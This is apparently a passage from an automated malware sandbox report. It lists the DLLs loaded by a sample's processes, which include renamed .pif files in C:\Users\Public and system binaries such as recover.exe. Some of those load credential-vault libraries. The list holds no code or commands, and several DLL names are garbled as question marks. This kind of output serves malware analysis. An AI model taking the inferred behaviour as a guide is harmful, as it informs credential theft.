Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: logoncli.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: dsrole.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\PING.EXE |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\PING.EXE |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\System32\PING.EXE |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: zipfldr.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: url.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ieframe.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: smartscreenps.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ieproxy.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: mssip32.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??????????.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ????.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ???e???????????.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ???e???????????.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??????????.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ???.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ???.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ???.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ????.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: tquery.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: cryptdll.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: spp.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: vssapi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: vsstrace.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: endpointdlp.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: endpointdlp.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: endpointdlp.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: endpointdlp.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: sppwmi.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: sppcext.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: winscard.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: devobj.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\PING.EXE |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\PING.EXE |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\PING.EXE |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\esentutl.exe |
Section loaded: esent.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\esentutl.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\esentutl.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: colorui.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: mscms.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: coloradapterclient.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: sti.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: devobj.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: cabinet.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Users\Public\expha.pif |
Section loaded: cabinet.dll |
Jump to behavior |
Source: C:\Users\Public\expha.pif |
Section loaded: cabinet.dll |
|
Source: C:\Users\Public\expha.pif |
Section loaded: cabinet.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: version.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: pstorec.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: vaultcli.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: dpapi.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: pstorec.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\SysWOW64\recover.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: certcli.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: cabinet.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: cryptui.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: certca.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: cryptsp.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: ncrypt.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: netapi32.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: ntdsapi.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: version.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: secur32.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: samcli.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: logoncli.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: dsrole.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: netutils.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: sspicli.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: ntasn1.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: uxtheme.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: profapi.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: certcli.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: cabinet.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: cryptui.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: ncrypt.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: netapi32.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: ntdsapi.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: certca.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: cryptsp.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: version.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: secur32.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: samcli.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: logoncli.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: dsrole.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: netutils.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: sspicli.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: ntasn1.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: uxtheme.dll |
|
Source: C:\Users\Public\ghf.pif |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\PING.EXE |
Section loaded: iphlpapi.dll |
|
Source: C:\Windows\System32\PING.EXE |
Section loaded: winnsi.dll |
|
Source: C:\Windows\System32\PING.EXE |
Section loaded: mswsock.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: zipfldr.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: propsys.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: uxtheme.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: windows.storage.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: wldp.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: kernel.appcore.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: profapi.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: edputil.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: urlmon.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: iertutil.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: srvcli.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: netutils.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: sspicli.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: wintypes.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: appresolver.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: bcp47langs.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: slc.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: userenv.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: sppc.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Users\Public\rdha.pif |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: version.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: uxtheme.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: url.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ieframe.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: iertutil.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: netapi32.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: userenv.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: winhttp.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: wkscli.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: netutils.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: windows.storage.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: wldp.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: kernel.appcore.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: propsys.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: amsi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: smartscreenps.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: winmm.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: wininet.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: sspicli.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: profapi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ondemandconnroutehelper.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: mswsock.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ieproxy.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: iphlpapi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: msasn1.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: winnsi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: mssip32.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ????.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ???e???????????.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ???e???????????.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??????????.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ???.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ???.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ???.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ????.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: ??l.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: sppc.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: tquery.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: cryptdll.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: spp.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: vssapi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: vsstrace.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: endpointdlp.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: endpointdlp.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: endpointdlp.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: endpointdlp.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: advapi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: sppwmi.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: slc.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: sppcext.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: winscard.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: devobj.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: cryptsp.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: rsaenh.dll |
|
Source: C:\Users\Public\ANYDESK.PIF |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: dwmapi.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: atlthunk.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: mmdevapi.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: devobj.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: windowscodecs.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: winmm.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: winmmbase.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: ksuser.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: avrt.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: audioses.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: powrprof.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: umpdc.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: msacm32.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: midimap.dll |
|
